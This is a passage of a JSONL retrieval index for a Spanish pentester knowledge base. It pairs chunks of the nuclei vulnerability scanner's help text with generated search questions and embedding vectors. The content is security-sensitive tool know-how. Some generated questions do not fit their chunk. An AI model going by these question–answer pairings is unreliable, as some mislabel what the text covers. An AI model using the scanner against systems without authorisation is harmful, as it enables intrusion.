0.00356, -0.05893, -0.03529, -0.01433, -0.0619, -0.09492, 0.01865, 0.04539, 0.03092, -0.0439, 0.06397, -0.01135, -0.06602, -0.03946, 0.08824, -0.0544, 0.0065, -0.01964, -0.03793, 0.09913, 0.04359, -0.02086, -0.0352, -0.02822, 0.01521, -0.08058, -0.01631, 0.1362, -0.08209, -0.00317, -0.03146, 0.08285, -0.03842, 0.02452, 0.02496, -0.007, 0.1086, -0.12304, -0.02682, -0.08815, -0.00655, 0.00281, -0.02653, 0.0251, 0.01303, 0.06503, -0.01972, 0.02612, -0.01248, 0.00375, 0.02048, 0.07874, -0.01438, 0.02245, -0.0622, -0.01661, 0.0376, 0.04866, -0.0248, -0.04686, 0.07315, 0.03293, -0.01382, 0.04218, -0.01505, -0.01731, -0.06286, -0.07096, 0.02203, -0.03654, 0.00313, -0.02338, -0.04106, 0.02336, 0.00462, -0.00868, -0.03346, 0.02118, 0.04913, 0.01172, 0.00217, 0.06341, 0.05749, 0.02094, -0.01122, 0.00444, 0.03932, -0.04085, 0.03796, -0.01137, -0.04103, -0.00731, -0.00214, -0.01164, -0.01147, -0.00931, -0.00081, 0.0068, 0.01032, 0.03315, 0.0703, -0.02837, 4e-05, -0.0355, 0.05415, -0.01275, -0.04086, 0.02487, 0.01013, -0.0074, 0.00728, -0.05873, 0.00536, 0.02101, 0.0539, 0.02982, 0.01359, -0.0105, -0.01254, 0.04163, 0.03751, 0.0491, -0.02798, 0.04307, -0.01766, -0.05436, 0.03535, -0.01356, 0.03934, -0.05116, -0.00631, -0.0014, -0.01526, 0.04272, 0.01517, -0.08052, -0.06911, -0.08041, -0.05994, -0.00037, -0.0197, -0.022, 0.00656, 0.03295, 0.04045, -0.04741, -0.03703, 0.011]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# nuclei β€” manual\n\nSalida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n nuclei [flags]\n\nFlags:\nTARGET:\n -u, -target string[] target URLs/hosts to scan\n -l, -list string path to file containing a list of target URLs/hosts to scan (one per line)\n -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)\n -resume string resume scan using resume.cfg (clustering will be disabled)\n -sa, -scan-all-ips scan all the IP's associated with dns record\n -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)", "indexar": "cual es una herramienta rΓ‘pida para escanear vulnerabilidades en URLs?", "v": [0.01373, -0.04808, -0.13133, -0.10057, 0.01121, -0.10265, -0.11278, -0.13343, 0.04819, 0.05143, -0.08517, -0.15077, -0.05692, -0.08433, -0.00262, 0.05786, -0.0036, -0.11962, 0.07422, 0.06725, -0.05075, -0.00637, -0.09852, -0.00618, -0.20529, -0.02341, -0.03074, 0.02858, -0.17128, -0.01557, -0.00417, 0.09136, 0.03387, 0.01887, -0.13037, 0.05242, 0.02531, 0.05214, 0.05398, 0.06566, 0.02932, -0.01186, -0.13982, -0.04039, 0.05338, -0.04048, -0.09995, 0.01556, 0.04485, 0.07735, -0.07044, -0.08363, -0.18715, -0.01232, -0.03961, -0.12535, 0.21813, -0.12311, 0.0245, -0.04151, -0.11106, 0.05375, 0.00205, -0.04863, -0.07282, -0.029, -0.04044, -0.04061, -0.16501, 0.07124, 0.00636, 0.01449, 0.02717, -0.00927, -0.02577, -0.03027, -0.05446, 0.06732, 0.00891, 0.04528, 0.07717, -0.0, -0.03019, 0.07449, -0.13064, -0.03754, 0.08809, -0.02524, 0.06794, -0.03449, 0.03064, 0.03948, -0.03874, 0.0255, 0.00187, -0.09137, 0.10154, -0.00972, -0.03905, -0.04624, -0.01414, -0.08832, -0.1374, 0.11656, 0.03014, 0.05682, -0.1086, 0.05875, -0.08209, 0.00834, 0.03521, 0.06096, -0.02431, -0.00013, -0.03862, 0.09219, -0.02024, -0.04965, 0.00877, -0.10092, 0.02298, -0.07994, -0.09006, -0.04561, -0.02057, 0.0504, -0.00062, 0.00592, -0.00388, -0.0966, 0.01868, -0.10615, -0.06211, 0.02264, 0.00131, 0.00142, 0.05869, -0.17248, -0.02661, -0.04083, 0.02164, -0.04601, -0.0117, -0.03676, -0.00299, 0.0529, 0.02682, -0.0253, -0.04625, 0.04474, 0.01357, -0.00116, -0.05929, -0.00844, -0.06669, -0.02295, -0.05745, 0.02646, -0.1043, 0.04734, -0.0097, 0.00439, 0.08678, 0.0303, -0.02009, -0.065, 0.07872, 0.05248, 0.03916, 0.04116, 0.04721, 0.07732, 0.02891, -0.02578, 0.03358, -0.06081, -0.0322, -0.00363, 0.00306, -0.07947, -0.00671, -0.04799, 0.00252, -0.01067, 0.03902, -0.05227, 0.06555, -0.00309, 0.0142, 0.05829, 0.00913, -0.04632, 0.00273, -0.05565, 0.06018, 0.02537, -0.02014, -0.07807, -0.02996, -0.04102, -0.07343, -0.04641, -0.05359, -0.05072, 0.04997, 0.06879, 0.02975, -0.12111, -0.04441, 0.04469, 0.02165, 0.01582, 0.06779, -0.02558, -0.0069, -0.04809, 0.00044, 0.05849, -0.03174, -0.05519, 4e-05, -0.02577, 0.04285, 0.03267, -0.01459, 0.01451, -0.0226, -0.01878, -0.03767, -0.03, 0.02832, -0.07453, -0.06006, -0.05906, 0.05196, -0.05827, 0.02347, -0.02789, -0.01035, 0.01108, 0.00757, 0.00682, -0.00333, -0.01885, -0.02845, -0.03173, -0.00967, -0.04078, -0.05298, -0.07506, -0.03623, -0.00892, 0.0311, -0.10611, 0.03577, -0.06949]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# nuclei β€” manual\n\nSalida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n nuclei [flags]\n\nFlags:\nTARGET:\n -u, -target string[] target URLs/hosts to scan\n -l, -list string path to file containing a list of target URLs/hosts to scan (one per line)\n -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)\n -resume string resume scan using resume.cfg (clustering will be disabled)\n -sa, -scan-all-ips scan all the IP's associated with dns record\n -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)", "indexar": "con que puedo automatizar el escaneo de mΓΊltiples direcciones IP y host?", "v": [-0.0491, -0.03588, -0.25038, -0.11435, 0.0345, -0.10183, -0.03611, -0.1243, -0.22341, -0.01478, 0.03331, -0.05825, 0.03407, -0.08931, 0.07315, 0.11717, 0.06965, -0.03431, 0.04647, 0.04538, 0.00281, 0.08526, -0.05253, 0.07163, -0.06819, 0.13641, -0.07641, 0.13841, -0.14001, -0.06011, -0.13613, -0.04045, -0.06489, -0.03741, 0.02696, -0.15884, 0.06569, 0.1185, -0.00129, -0.003, 0.02341, 0.07965, -0.11969, -0.09588, 0.05071, 0.03992, -0.02612, -0.04941, 0.01486, -0.09087, -0.12697, -0.19378, -0.0765, -0.04932, -0.04549, 0.00265, 0.11057, -0.03949, 0.03635, -0.04522, -0.00332, 0.11629, -0.03855, 0.05746, -0.03591, -0.03343, -0.02645, 0.00617, -0.0701, -0.0449, 0.00373, 0.0401, 0.03551, 0.07421, 0.04964, 0.0567, -0.02796, -0.00494, 0.02619, 0.05983, -0.03, 0.01105, -0.13439, 0.00782, -0.07018, -0.05116, 0.0497, -0.17484, -0.01751, -0.03646, 0.03314, 0.00531, -0.00137, 0.04607, 0.072, -0.0201, 0.08259, 0.04595, -0.03347, 0.02895, 0.02861, 0.0891, -0.14085, 0.17646, 0.10364, 0.09793, 0.08451, 0.00391, 0.05739, -0.01073, -0.05237, 0.04974, -0.00527, -0.07929, -0.05064, -0.05064, -0.0408, -0.0096, 0.06658, -0.01326, -0.05467, -0.08393, 0.01363, 0.02353, 0.06129, 0.02514, -0.01114, 0.10114, 0.10049, -0.01366, -0.0053, 0.00396, -0.06205, -0.04713, 0.01607, 0.03255, 0.02872, -0.05773, -0.00521, 0.01042, 0.01704, 0.06225, 0.02076, -0.09616, 0.0508, -0.03962, -0.00613, -0.11922, -0.06752, 0.0167, -0.00377, 0.02018, 0.04003, 0.02225, -0.08425, 0.04471, 0.00709, -0.03702, 0.03985, 0.07849, -0.00408, -0.0154, 0.00223, 0.04467, 0.01294, 0.01696, -0.08365, 0.00525, 0.02609, -0.01695, -0.04235, 0.13359, -0.07514, -0.01346, -0.06178, 0.0017, -0.00828, -0.03095, 0.01889, -0.00813, 0.01543, -0.00653, -0.01152, -0.01186, 0.03777, 0.02208, 0.02081, -0.00773, -0.00187, 0.03074, 0.03969, 0.02501, -0.04729, 0.01524, 0.03089, -0.04771, -0.04176, -0.05774, -0.02035, -0.06097, -0.07753, 0.06766, -0.04024, -0.00934, 0.0429, 0.04056, -0.05621, 0.02899, 0.01966, 0.00414, 0.0129, -0.07993, 0.06687, -0.0833, -0.07387, 0.01815, -0.01299, -0.03683, -0.00279, 0.01259, 0.00055, 0.00802, 0.01081, -0.03104, -0.02736, -0.01387, 0.04821, 0.00856, 0.09233, -0.00012, -0.08257, 0.06648, -0.02185, -0.02228, 0.04499, -0.0117, 0.04617, -0.03052, -0.0165, -0.05231, 0.00553, 0.03885, -0.02117, -0.04898, -0.02974, -0.06163, -0.09187, 0.0334, -0.00023, -0.04434, -0.03144, 0.05726, 0.01194, -0.02469, -0.01404, 0.00129]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# nuclei β€” manual\n\nSalida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n nuclei [flags]\n\nFlags:\nTARGET:\n -u, -target string[] target URLs/hosts to scan\n -l, -list string path to file containing a list of target URLs/hosts to scan (one per line)\n -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)\n -resume string resume scan using resume.cfg (clustering will be disabled)\n -sa, -scan-all-ips scan all the IP's associated with dns record\n -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)", "indexar": "existe un programa que detecte fallos de seguridad usando plantillas personalizables?", "v": [0.08805, 0.01187, -0.23733, -0.23978, 0.04864, -0.09005, -0.0163, -0.13115, -0.10118, -0.08168, -0.03361, 0.08245, -0.12338, 0.01158, 0.01207, -0.08138, 0.01513, -0.1284, 0.04001, -0.02424, -0.07485, -0.14921, -0.21096, -0.10641, -0.03737, 0.06401, -0.01814, -0.06275, -0.08693, -0.0561, 0.08279, -0.04022, 0.00445, -0.10789, -0.07413, 0.013, -0.13712, -0.07696, -0.03403, 0.05418, 0.02779, -0.00662, -0.05798, 0.01802, 0.07081, 0.00864, -0.00065, -0.02472, 0.05643, 0.0291, -0.0426, -0.00475, -0.02943, -0.06075, 0.06533, -0.17515, 0.11203, -0.02119, 0.03332, -0.05699, -0.15986, -0.01225, 0.09488, 0.04097, 0.03271, -0.08381, 0.07173, 0.0075, -0.04463, -0.06902, -0.01515, -0.07185, 0.01668, 0.05245, 0.0445, -0.05937, 0.01761, 0.04103, 0.11004, 0.05763, -0.09881, -0.02485, -0.02059, 0.02862, -0.12256, 0.00578, -0.0157, 0.03549, -0.11586, -0.0356, 0.07488, 0.09601, -0.01249, 0.01928, -0.01464, -0.02443, 0.19341, 0.00997, -0.00248, 0.04817, 0.06053, 0.00917, -0.05024, 0.08819, 0.0511, 0.10614, 0.03145, 0.02062, 0.04201, -0.03414, 0.01252, -0.00929, -0.0026, -0.055, -0.08275, 0.01804, 0.0386, -0.05634, 0.02587, -0.02847, -0.07148, -0.03437, -0.01724, -0.03908, 0.05895, -0.03428, -0.05124, 0.11574, -0.10515, 0.05306, 0.07551, -0.06487, -0.11675, -0.04728, -0.09882, 0.02647, 0.00906, -0.04261, -0.04534, -0.02179, 0.05167, 0.01393, 0.03743, 0.0688, 0.00464, 0.02978, -0.0605, -0.00054, -0.0848, 0.06525, -0.02711, 0.06929, -0.0156, 0.04082, -0.04901, 0.00439, -0.00829, -0.02364, -0.02581, 0.06225, -0.0208, 0.02458, 0.01368, 0.01523, 0.06176, -0.00569, 0.06723, 0.01242, 0.09998, 0.05948, 0.01226, 0.0715, 0.01829, -0.12178, -0.06357, 0.01604, -0.02482, -0.11945, 0.00743, -0.03467, -0.05484, 0.01181, 0.06017, -0.00199, 0.05275, -0.08278, -0.0139, 0.06594, 0.00664, -0.02191, -0.00324, 0.03341, -0.03193, 0.0244, -0.02535, 0.03386, 0.01051, -0.05286, -0.00452, 0.03748, -0.05687, 0.03095, -0.00148, -0.01499, 0.07409, 0.05365, -0.06245, 0.00886, 0.0726, 0.04013, 0.0355, -0.03146, 0.02177, -0.02578, -0.01972, -0.01255, -0.00804, 0.05754, -0.01124, 7e-05, 0.0085, -0.01503, 0.04656, 0.02504, -0.06301, -0.0248, -0.02999, 0.04689, 0.03672, 0.03411, 0.04753, -0.02078, -0.07644, -0.05165, 0.02877, -0.03745, 0.01652, -0.0283, -0.02774, -0.09664, -0.02227, 0.0771, -0.0049, -0.04836, -0.01363, -0.03843, -0.02519, -0.00784, 0.05523, -0.02802, -0.00401, 0.05683, 0.00652, -0.09323, 0.04485, -0.03447]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TARGET-FORMAT:\n -im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default \"list\")\n -ro, -required-only use only required fields in input format when generating requests\n -sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file", "indexar": "cual es una alternativa libre a Burp Suite?", "v": [-0.1028, 0.00876, -0.05917, -0.01599, -0.19588, -0.07551, 0.02438, -0.17824, -0.12359, -0.06386, -0.09483, -0.088, -0.0269, 0.08454, -0.03026, -0.17941, -0.06856, -0.05432, 0.09096, 0.04102, 0.06389, 0.10505, -0.06752, -0.01841, -0.0171, -0.05941, 0.00473, -0.0003, -0.00616, 0.03823, 0.04781, -0.01153, 0.0461, -0.01185, -0.01324, -0.05862, 0.0827, 0.0881, 0.03869, -0.08985, 0.06207, -0.05129, -0.01092, 0.17739, -0.03153, -0.09518, -0.06273, 0.10326, 0.05991, 0.04624, -0.13157, -0.00404, -0.03212, 0.05111, 0.09772, -0.05812, 0.11382, -0.07997, -0.04604, 0.02954, 0.01501, 0.07919, 0.04396, -0.0872, 0.03042, -0.05738, 0.00636, -0.05295, -0.04127, 0.00738, -0.04301, -0.05281, 0.04649, -0.00787, -0.15565, 0.00639, -0.10403, -0.04687, 0.01191, 0.04343, 0.08082, -0.06019, -0.09864, 0.0711, -0.05054, -0.11306, 0.13478, -0.13693, -0.06256, 0.08371, 0.1095, 0.01961, 0.05166, 0.13982, 0.01005, -0.11388, 0.09351, 0.1468, -0.00441, 0.06685, 0.09385, 0.05459, -0.10783, 0.01717, -0.02112, -0.00444, -0.06041, 0.06421, -0.03194, 0.04597, -0.05593, 0.07233, -0.00619, -0.01908, -0.04206, -0.07379, -0.05458, 0.02421, 0.02475, -0.01148, -0.06596, -0.02945, -0.05071, -0.09801, 0.01779, 0.07255, -0.01307, 0.01184, -0.01414, 0.06062, -0.0283, 0.01303, -0.07079, -0.05882, -0.07821, -0.08945, 0.08147, -0.04299, 0.04087, -0.02588, 0.00115, -0.00073, 0.00813, -0.04832, 0.06238, 0.00387, 0.04779, -0.10541, 0.01941, -0.03018, -0.0689, 0.00553, -0.03075, 0.0841, -0.04883, 0.03272, -0.10356, -0.01995, -0.02592, 0.08175, -0.00155, -0.03863, -0.05259, 0.04855, 0.03204, -0.08297, 0.01421, -0.00327, -0.05889, 0.05965, -0.0207, 0.07522, 0.03433, -0.05651, 0.05402, -0.0232, 0.00386, -0.10421, 0.02048, -0.0297, 0.00592, 0.05772, -0.09878, -0.00197, -0.041, -0.05908, -0.03314, 0.0512, 0.06472, 0.05071, -0.05691, 0.02721, -0.07421, -0.08861, -0.04115, -0.00906, -0.02873, -0.1372, 0.01112, -0.03152, -0.08577, -0.02677, -0.04563, -0.0356, -0.0309, -0.00821, -0.01485, 0.04372, -0.03547, 0.07354, 0.03954, 0.01277, 0.11059, 0.01356, -0.07304, 0.00504, 0.01625, -0.00068, 0.00845, -0.01211, 0.03217, 0.04347, 0.03188, 0.00852, -0.02643, 0.04011, 0.03351, 0.05748, -0.05156, 0.04325, -0.01008, 0.01907, -0.01222, 0.049, 0.01277, 0.01414, 0.02176, 0.04147, -0.03099, -0.02314, 0.0984, 0.06228, -0.07044, -0.02785, -0.01454, 0.00063, -0.09938, 0.0063, -0.05462, -0.02842, -0.03266, 0.0474, 0.00385, -0.00558, 0.03297, -0.002]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TARGET-FORMAT:\n -im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default \"list\")\n -ro, -required-only use only required fields in input format when generating requests\n -sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file", "indexar": "que herramienta sirve para probar APIs sin formato JSON?", "v": [-0.08723, 0.00615, -0.16399, -0.23487, -0.01188, -0.1881, 0.04468, -0.1366, -0.0206, 0.00286, -0.03735, -0.05936, 0.0291, -0.04895, 0.08353, 0.01446, 0.14541, -0.13692, -0.02476, 0.11086, 0.00152, 0.05511, -0.16546, -0.11999, 0.00615, 0.09315, 0.10805, -0.02948, -0.16423, -0.00137, -0.03921, -0.07047, 0.10047, -0.0235, -0.18563, -0.05109, -0.03227, 0.08651, -0.08383, 0.19368, 0.0757, -0.05376, -0.07332, 0.04984, -0.08154, 0.14895, 0.03521, 0.06821, -0.06238, 0.05448, -0.02031, -0.12537, -0.13468, 0.10431, -0.03785, -0.10302, 0.08728, -0.14067, 0.0022, -0.06273, -0.05994, -0.11097, -0.09079, -0.11938, 0.04101, -0.04319, 0.01743, -0.05065, -0.12446, 0.07313, -0.03977, -0.05033, 0.03918, -0.04642, -0.06652, -0.03524, 0.00334, -0.00227, 0.06326, 0.02129, 0.07704, 0.02544, -0.06554, 0.001, 0.02256, -0.01663, -0.01713, 0.01329, -0.01156, -0.03066, -0.00949, -0.00118, 0.08789, 0.07261, 0.06341, -0.03003, 0.09583, -0.04162, 0.04771, -0.03371, 0.08646, -0.06399, -0.14407, -0.01057, -0.00309, 0.02869, 0.03285, -0.04315, -0.03203, 0.00013, 0.0613, 0.11309, -0.06823, 0.05465, -0.00687, 0.02067, -0.01843, -0.07026, -0.04392, -0.02458, 0.07044, 0.00843, -0.08253, 0.02122, -0.02519, 0.045, -0.05654, 0.02983, 0.02981, 0.00081, 0.00438, -0.01941, -0.03056, 0.0875, 0.03577, 0.04044, 0.11606, -0.05231, -0.01429, -0.01211, -0.01821, 0.03817, -0.01321, -0.08536, 0.02604, -0.06314, 0.06985, -0.00968, -0.02858, -0.00192, 0.03238, -0.09412, -0.02238, 0.04046, -0.0631, -0.06219, -0.0112, 0.01781, -0.09404, 0.03282, -0.04746, 0.00728, 0.04568, 0.05385, 0.04781, -0.01121, 0.07043, -0.07624, 0.07929, 0.0434, 0.06652, 0.03973, 0.03722, -0.06581, 0.03506, -0.00607, -0.0442, 0.02645, 0.02225, -0.05701, -0.05735, -0.04057, -0.02944, -0.00253, -0.01446, -0.07422, 0.0291, -0.03089, -0.00062, -0.04649, -0.0141, 0.07337, 0.02618, -0.04061, 0.06516, 0.00717, -0.01269, -0.03907, -0.03774, 0.00012, -0.05912, -0.04143, -0.02341, -0.0373, -0.00854, 0.02549, -0.02744, -0.00387, -0.00593, 0.01078, 0.02083, 0.02633, 0.01423, -0.04645, 0.01716, -0.04003, -0.00082, 0.01775, -0.00829, 0.02563, -0.03164, 0.01731, -0.00506, -0.00025, 0.04352, 0.04918, 0.01777, -0.03145, -0.01654, -0.01561, 0.05955, 0.03551, -0.04459, 0.00921, 0.01441, -0.0447, 0.0363, 0.00998, -0.04456, -0.03031, -0.0189, 0.02687, -0.03563, -0.03298, -0.02921, -0.0613, -0.01446, -0.00294, -0.01046, -0.05257, -0.05207, 0.04024, 0.10445, 0.00488, -0.00261, -0.0072]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, -templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "indexar": "cual es un programa para escanear webs automΓ‘ticamente con nuevas plantillas?", "v": [0.14207, 0.01314, -0.10895, -0.13533, 0.15264, -0.15723, -0.00175, -0.24302, -0.08584, -0.01114, -0.04299, -0.01283, -0.01813, -0.09074, -0.06434, 0.05283, 0.03237, -0.20708, 0.20021, 0.11996, -0.11124, -0.05389, -0.16285, -0.06962, -0.07649, -0.05507, 0.05213, 0.05277, -0.16787, 0.02329, -0.01544, 0.08222, 0.02958, -0.01383, 0.00621, 0.03437, 0.01268, 0.04954, -0.0476, -0.04572, -0.03035, -0.02232, -0.10048, 0.02648, 0.02594, 0.00416, 0.01805, 0.02748, 0.04358, -0.04242, -0.07077, 0.08708, 0.01008, 0.00273, 0.01773, -0.10177, 0.1859, -0.08832, -0.08281, -0.02418, -0.07038, 0.08075, 0.01594, 0.0043, -0.00842, 0.01821, 0.04048, 0.0064, -0.01965, 0.02935, 0.02863, 0.03973, 0.09997, -0.06302, -0.02551, 0.01991, -0.05143, -0.02057, -0.00162, 0.0718, -0.00352, -0.1006, -0.02947, 0.10404, -0.06751, 0.05502, -0.03128, -0.02448, -0.01134, -0.06781, 0.06425, 0.03167, -0.03739, 0.13008, 0.033, -0.10252, 0.16478, -0.01932, 0.02707, 0.00026, -0.0792, -0.06119, -0.08297, 0.14572, -0.04068, 0.08353, 0.02499, -0.01044, -0.088, 0.05793, 0.03432, 0.04466, -0.0265, -0.04341, -0.08293, 0.02411, 0.05023, 0.02662, 0.05232, -0.08165, -0.05911, -0.00223, -0.04878, -0.00594, 0.03737, -0.01018, 0.02731, 0.08224, -0.04623, 0.01164, -0.04536, -0.08088, -0.05181, -0.05102, -0.13407, -0.0663, 0.01148, 0.02162, 0.01697, -0.04922, -0.01493, 0.06439, 0.06693, 0.07747, 0.02645, -0.06721, -0.00405, -0.09188, -0.06393, 0.01763, 0.01368, 0.08951, 0.00939, 0.07761, -0.09855, 0.0026, -0.01138, 0.00151, 0.00014, 0.074, -0.01808, 0.00968, -0.03472, -0.01415, 0.01005, -0.04784, -0.0827, 0.00491, 0.04258, 0.05578, 0.04763, 0.08339, 0.01401, -0.0694, 0.00254, 0.03525, 0.00451, -0.07292, 0.0512, -0.0059, -0.08843, 0.04772, 0.05175, 0.00862, -0.00468, -0.09872, -0.01914, 0.0211, -0.01992, 0.01942, -0.02501, 0.01546, -0.03311, -0.04114, 0.02491, 0.04039, -0.02884, -0.03031, -0.01173, -0.04203, -0.07706, 0.01878, -0.00826, -0.06672, 0.03932, 0.10246, 0.02091, -0.06016, 0.0418, 0.08458, -0.00844, -0.03023, 0.04702, -0.02001, -0.0337, -0.04627, 0.00035, -0.03457, 0.04205, 0.03294, 0.02427, -0.04615, 0.07067, 0.01327, -0.06566, 0.0258, 0.01969, 0.06887, 0.04607, -0.01914, -0.04126, -0.03714, -0.02174, -0.04987, 0.0484, 0.00264, 0.04312, -0.02672, -0.06156, -0.04729, -0.03808, 0.04187, 0.00435, -0.04387, -0.02052, -0.04574, -0.01222, -0.0118, 0.02038, -0.00914, -0.02114, 0.06947, -0.0259, -0.04995, 0.06023, 0.02482]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, -templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "indexar": "que herramienta sirve para generar y ejecutar plantillas usando una pregunta de IA?", "v": [0.07815, 0.10182, -0.21648, -0.14019, 0.17344, -0.14358, 7e-05, -0.10319, 0.00955, -0.11934, -0.03847, 0.08442, 0.0172, -0.05734, -0.04044, -0.02446, 0.06922, -0.1445, 0.02849, 0.01655, -0.03077, -0.00939, -0.12578, -0.0849, -0.20768, 0.05593, 0.03373, -0.03359, -0.19399, 0.01528, -0.02703, 0.01252, 0.0333, -0.1033, -0.09948, -0.05946, -0.07189, 0.09505, -0.07147, 0.09574, -0.03211, 0.08702, -0.08119, 0.03233, 0.01503, 0.12065, 0.03864, -0.04547, -0.03002, 0.10146, -0.05915, -0.08715, -0.07394, -0.03425, -0.02566, -0.08125, 0.23401, -0.18958, 0.0252, -0.08741, -0.12149, -0.06061, 0.04001, 0.03908, 0.04409, -0.02213, -0.02892, -0.09304, 0.0074, 0.00274, -0.12725, -0.00921, -0.00422, -0.01136, 0.02892, 0.00561, 0.00915, 0.00802, 0.01524, 0.08738, 0.02063, -0.08934, -0.10317, -0.05071, -0.09412, 0.01274, 0.03855, 0.01894, 0.00705, -0.07254, -0.01774, 0.05898, -0.03618, 0.03628, -0.019, -0.04507, 0.06744, -0.00924, 0.05246, 0.00066, 0.14454, -0.06803, -0.06287, 0.05293, 0.02765, 0.08398, 0.03655, -0.07473, -0.04633, 0.00781, 0.0654, 0.01256, -0.0185, -0.0711, -0.01073, 0.02894, 0.01539, -0.04716, -0.02594, -0.01888, 0.03032, 0.07901, -0.06559, -0.03771, 0.02105, -0.06618, -0.02944, 0.07267, -0.04928, -0.03075, -0.03317, -0.06739, -0.08889, 0.01012, -0.02946, -0.01027, 0.08188, -0.09221, 0.00822, -0.09979, 0.07194, 0.05998, -0.00824, -0.06265, 0.04759, 0.05069, 0.02105, -0.09164, -0.03268, 0.00282, 0.07492, -0.08376, 0.03524, 0.07496, -0.10721, -0.04964, -0.01065, -0.01106, -0.04467, 0.08246, -0.03978, 0.00207, 0.01394, 0.01791, 0.00533, -0.04112, -0.0045, -0.01413, 0.09694, 0.09384, 0.07369, 0.01699, 0.01489, -0.04223, 0.05431, -0.05124, -0.06674, -0.02053, 0.01543, -0.0276, -0.03026, 0.00057, -0.02016, 0.0059, -0.02319, -0.04749, 0.05394, -0.01222, -0.00407, 0.05558, 0.00999, 0.04247, 0.04503, -0.07457, 0.05458, 0.01487, 0.00358, -0.0224, 0.02077, -0.02494, -0.01443, 0.00572, -0.01782, -0.02505, 0.07144, 0.06547, -0.06291, 0.02582, 0.00937, 0.04318, 0.01231, 0.02052, 0.04764, -0.02551, -0.02465, -0.04999, 0.00442, 0.01959, -0.00232, 0.00692, 0.02368, 0.01621, 0.08428, -0.02553, 0.01259, 0.07741, 0.01462, -0.02283, 0.0115, 0.00456, 0.01436, 0.01911, -0.01959, -0.01888, 0.00624, -0.02684, 0.03525, -0.00882, -0.0664, -0.06807, 0.0186, 0.04349, -0.03432, -0.06553, -0.02514, -0.05569, -0.03153, -0.0351, 0.00587, -0.09067, -0.05694, 0.02762, 0.05937, -0.01002, 0.05325, -0.03588]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, 